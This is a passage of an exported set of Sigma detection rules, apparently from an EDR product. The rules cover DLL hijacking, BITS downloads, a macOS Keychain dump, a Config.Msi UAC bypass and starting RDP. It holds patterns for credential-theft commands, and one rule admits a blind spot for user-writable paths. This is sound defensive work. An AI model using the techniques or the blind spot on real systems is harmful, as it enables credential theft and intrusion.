'\\graphics-check.exe'\n ProcessSignature: 'Orange View Ltd'\n ImageLoaded|endswith: '\\dxgi.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\iTop'\n - '?:\\Program Files (x86)\\iTop'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\iTop'\n - '?:\\Program Files (x86)\\iTop'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Orange View Ltd'\n - 'iTop Inc.'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5b9d91f9-ee6e-4bf2-879a-920f4bf62aca",
"rule_name": "DLL Hijacking via graphics-check.exe",
"rule_description": "Detects potential Windows DLL Hijacking via graphics-check.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate, signed executable and planting the malicious DLL within the same folder, so that the malicious code runs under the identity of the trusted binary.\nThis rule fires when a signed graphics-check.exe running from outside its expected iTop installation folder loads a dxgi.dll that is itself located outside the iTop or Windows system folders and does not carry an expected publisher signature.\nIt is recommended to investigate the loaded library for malicious content (origin, signature, hash) and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ba1dcdf-d94a-4e09-a0ee-104f04e4db05",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090945Z",
"creation_date": "2026-03-23T11:45:34.090947Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090951Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dirquota.yml",
"content": "title: DLL Hijacking via dirquota.exe\nid: 5ba1dcdf-d94a-4e09-a0ee-104f04e4db05\ndescription: |\n Detects potential Windows DLL Hijacking via dirquota.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dirquota.exe'\n ImageLoaded|endswith:\n - '\\mfc42u.dll'\n - '\\srmtrace.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ba1dcdf-d94a-4e09-a0ee-104f04e4db05",
"rule_name": "DLL Hijacking via dirquota.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dirquota.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder, so that the malicious code runs under the identity of the trusted binary.\nThis rule fires when a copy of dirquota.exe running from outside the Windows system folders (System32, SysWOW64, WinSxS) loads an mfc42u.dll or srmtrace.dll that is itself located outside those folders and is not signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content (origin, signature, hash) and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5bbb79dc-a1b1-497f-a6ed-91e61c9724b7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079524Z",
"creation_date": "2026-03-23T11:45:34.079526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079530Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/win32/bits/using-windows-powershell-to-create-bits-transfer-jobs",
"https://www.mandiant.com/resources/blog/alphv-ransomware-backup",
"https://attack.mitre.org/techniques/T1197/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1197_powershell_download_bits.yml",
"content": "title: BITS Download Started via PowerShell\nid: 5bbb79dc-a1b1-497f-a6ed-91e61c9724b7\ndescription: |\n Detects the suspicious usage of Start-BitsTransfer PowerShell cmdlet.\n This cmdlet can be used to copy or download files via the Background Intelligent Transfer Service (BITS).\n This service is an asynchronous file transfer mechanism and it is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\n By default, BITS jobs have a 90 days maximum lifetime if complete or cancel method are not called.\n It is recommended to investigate the parent process for suspicious activities as well as to look for suspicious network connections performed by the svchost.exe process hosting the BITS service.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/bits/using-windows-powershell-to-create-bits-transfer-jobs\n - https://www.mandiant.com/resources/blog/alphv-ransomware-backup\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/06/17\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1197\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Start-BitsTransfer '\n\n #exclusion_serviceportalagent:\n # PowershellCommand|contains|all:\n # - 'function Get-VersionFromString{'\n # - 'function Start-Download {'\n # - '# The progress bar breaks Metis return results'\n # - 'Start-BitsTransfer -Source $Source -Destination $Destination -ErrorAction Stop'\n\n exclusion_programfiles:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n 
exclusion_serviceportalagent:\n ProcessOriginalFileName: 'MmrAgent.NetFxEmulator.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Microsoft Corporation\"\n\n exclusion_sqlservr:\n ProcessGrandparentImage: '?:\\MSSQL??.INS??\\MSSQL\\Binn\\sqlservr.exe'\n\n exclusion_flutter:\n PowershellCommand|contains: '# Copyright 2014 The Flutter Authors. All rights reserved.'\n PowershellScriptPath|endswith: '\\bin\\internal\\update_dart_sdk.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5bbb79dc-a1b1-497f-a6ed-91e61c9724b7",
"rule_name": "BITS Download Started via PowerShell",
"rule_description": "Detects the suspicious usage of the Start-BitsTransfer PowerShell cmdlet.\nThis cmdlet can be used to copy or download files via the Background Intelligent Transfer Service (BITS).\nBITS is an asynchronous file transfer mechanism that is often used by attackers to download malicious files, exfiltrate data or maintain persistence, since the transfer itself is performed by the BITS service rather than by the attacker's process.\nBy default, a BITS job has a maximum lifetime of 90 days if neither its Complete nor its Cancel method is called.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for suspicious network connections performed by the svchost.exe process hosting the BITS service.\n",
"rule_creation_date": "2022-06-17",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1105",
"attack.t1197"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5bde067c-304d-4d0b-8cb9-50699ac247df",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294931Z",
"creation_date": "2026-03-23T11:45:35.294934Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294940Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md",
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1555_001_keychain_export_dump_keychain.yml",
"content": "title: MacOS Keychain Exported via Dump Keychain\nid: 5bde067c-304d-4d0b-8cb9-50699ac247df\ndescription: |\n Detects the macOS Keychain being exported via security using the dump-keychain command.\n Keychain (or Keychain Services) is the macOS credential management system.\n Attackers may export macOS Keychain to gather user credentials, certificates, payment data, or secure notes.\n It is recommended to analyze the context around the execution of the security binary to determine if this export is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2022/08/29\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # security dump-keychain -d\n Image: '/usr/bin/security'\n CommandLine|contains: 'dump-keychain'\n ParentImage|contains: '?'\n\n # Git LFS seems to use keychain.\n exclusion_git_lfs:\n ParentImage|endswith: '/bin/git-lfs'\n CommandLine|contains|all:\n - 'find-certificate'\n - '/Library/Keychains/System.keychain'\n\n # Visual Studio Code is expected to use keychain.\n exclusion_vs_code:\n ParentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Plugin).app/Contents/MacOS/Code - Insiders Helper'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Plugin).app/Contents/MacOS/Code - Insiders Helper (Plugin)'\n - '/Applications/Visual Studio Code.app/Contents/MacOS/Electron'\n - 
'*/Visual Studio Code.app/Contents/MacOS/Electron'\n - '*/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Users/*/.vscode/extensions/sonarsource.sonarlint-vscode-*-*/*/*/bin/java'\n - '/Users/*/.vscode-insiders/extensions/sonarsource.sonarlint-vscode-*-*/*/*-*/bin/java'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/MacOS/Electron'\n CommandLine|contains: 'security find-certificate -a -p'\n\n exclusion_glpi:\n ParentImage: '/Applications/GLPI-Agent/bin/perl'\n\n exclusion_docker:\n - ParentImage: '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n GrandparentImage:\n - '/Applications/Docker.app/Contents/MacOS/Docker'\n - '/sbin/launchd'\n - '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n\n exclusion_node:\n ParentImage: '/Users/*/.nvm/versions/node/v*/bin/node'\n\n exclusion_fortinet:\n ParentImage:\n - '/Library/Application Support/Fortinet/FortiClient/bin/epctrl'\n - '/Library/Application Support/Fortinet/FortiClient/bin/ztagent'\n\n exclusion_postman:\n ParentImage: '/Applications/Postman.app/Contents/MacOS/Postman'\n\n exclusion_lens:\n ParentImage: '/Applications/Lens.app/Contents/MacOS/Lens'\n\n exclusion_ruby:\n ParentImage:\n - '/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - '/System/Library/Frameworks/Ruby.framework/Versions/*/usr/bin/ruby'\n\n exclusion_azure:\n ParentImage: '/Applications/Azure Data Studio.app/Contents/Frameworks/Azure Data Studio Helper (Plugin).app/Contents/MacOS/Azure Data Studio Helper (Plugin)'\n\n exclusion_openvpn:\n GrandparentImage: '/Applications/OpenVPN Connect/OpenVPN Connect.app/Contents/MacOS/OpenVPN Connect'\n\n exclusion_rider:\n ParentImage: '/users/*/applications/rider.app/contents/macos/rider'\n\n exclusion_intellij:\n ParentImage:\n - '/Applications/IntelliJ IDEA.app/Contents/MacOS/idea'\n - '/Users/*/Library/Application Support/JetBrains/IntelliJIdea*'\n\n exclusion_common_folders:\n - 
ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5bde067c-304d-4d0b-8cb9-50699ac247df",
"rule_name": "MacOS Keychain Exported via Dump Keychain",
"rule_description": "Detects the macOS Keychain being exported via the 'security' command-line tool using its dump-keychain subcommand (e.g. 'security dump-keychain -d').\nKeychain (or Keychain Services) is the macOS credential management system.\nAttackers may export the macOS Keychain to gather user credentials, certificates, payment data, or secure notes.\nNote that this rule suppresses executions whose parent or grandparent process is located under common application folders, including user-writable locations such as '/Users/*/Library/' and '/Users/*/Applications/'; a dump-keychain invocation launched from such a path will not raise an alert.\nIt is recommended to analyze the context around the execution of the security binary (parent process, user, timing) to determine if this export is legitimate.\n",
"rule_creation_date": "2022-08-29",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c110770-959d-46ff-accb-461154a9d92d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594664Z",
"creation_date": "2026-03-23T11:45:34.594667Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594675Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/0xToxin/status/1622651732160282628",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_runtimebroker.yml",
"content": "title: DLL Hijacking via RuntimeBroker.exe\nid: 5c110770-959d-46ff-accb-461154a9d92d\ndescription: |\n Detects potential Windows DLL Hijacking via RuntimeBroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/0xToxin/status/1622651732160282628\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'RuntimeBroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\rmclient.dll'\n - '\\umpdc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c110770-959d-46ff-accb-461154a9d92d",
"rule_name": "DLL Hijacking via RuntimeBroker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via RuntimeBroker.exe.\nDLL hijacking takes advantage of the default Windows search order by placing a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting a malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c16d11a-fb1c-47ea-92f2-3c71808bc881",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624056Z",
"creation_date": "2026-03-23T11:45:34.624058Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624063Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks",
"https://github.com/Wh04m1001/IFaultrepElevatedDataCollectionUAC",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_config_msi.yml",
"content": "title: Config.Msi UAC Bypass Executed\nid: 5c16d11a-fb1c-47ea-92f2-3c71808bc881\ndescription: |\n Detects the UAC bypass technique exploiting the MSI rollback scripts.\n Attackers with low-privileged code execution on a target host and an arbitrary file or directory delete can achieve UAC bypass with privilege escalation to SYSTEM.\n It is recommended to analyze the .rbs or rbf file to look for malicious content, as well as to look for suspicious processes stemming from msiexec during the rollback operation.\nreferences:\n - https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks\n - https://github.com/Wh04m1001/IFaultrepElevatedDataCollectionUAC\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2022/11/04\nmodified: 2026/03/19\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path:\n - '?:\\Config.Msi\\\\*.rbs'\n - '?:\\Config.Msi\\\\*.rbf'\n\n filter_legitimate_writer_1:\n - ProcessOriginalFileName:\n - 'msiexec.exe'\n - 'Wmiprvse.exe'\n - 'MDMAppInstaller.exe'\n ProcessUserSID: 'S-1-5-18'\n - ProcessImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n ProcessUserSID: 'S-1-5-18'\n\n filter_legitimate_writer_2:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n\n filter_legitimate_writer_3:\n ProcessOriginalFileName: 'MDMAppInstaller.exe'\n ProcessParentImage:\n - '?:\\Windows\\System32\\omadmclient.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n filter_legitimate_writer_4:\n # C:\\Program Files (x86)\\Kaspersky 
Lab\\Kaspersky Endpoint Security for Windows\\avp.exe\n ProcessProcessName: 'avp.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Kaspersky Lab'\n - 'Kaspersky Lab JSC'\n\n filter_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_intune:\n ProcessImage: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_kerio:\n ProcessImage:\n - '?:\\Program Files\\Kerio\\UpdaterService\\ktupdaterservice.exe'\n - '?:\\Program Files (x86)\\Kerio\\UpdaterService\\ktupdaterservice.exe'\n ProcessOriginalFileName: 'ktupdaterservice.exe'\n\n exclusion_doubletake:\n ProcessImage: '?:\\Program Files\\Vision Solutions\\Double-Take\\DoubleTake.exe'\n\n exclusion_defender:\n ProcessImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c16d11a-fb1c-47ea-92f2-3c71808bc881",
"rule_name": "Config.Msi UAC Bypass Executed",
"rule_description": "Detects the UAC bypass technique exploiting the MSI rollback scripts.\nAttackers with low-privileged code execution on a target host and an arbitrary file or directory delete can achieve UAC bypass with privilege escalation to SYSTEM.\nIt is recommended to analyze the .rbs or .rbf file to look for malicious content, as well as to look for suspicious processes stemming from msiexec during the rollback operation.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2026-03-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c19d920-4c81-4370-9af8-25e9bef6b870",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077094Z",
"creation_date": "2026-03-23T11:45:34.077096Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077101Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://revertservice.com/10/termservice/",
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://attack.mitre.org/techniques/T1021/001/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1021_001_net_start_rdp.yml",
"content": "title: Remote Desktop Services Enabled via net.exe\nid: 5c19d920-4c81-4370-9af8-25e9bef6b870\ndescription: |\n Detects command-line arguments starting the \"TermService\" service, which is required for Remote Desktop Services, via the \"net\" utility.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - http://revertservice.com/10/termservice/\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://attack.mitre.org/techniques/T1021/001/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/01/16\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.001\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_command:\n CommandLine|contains: ' start TermService'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
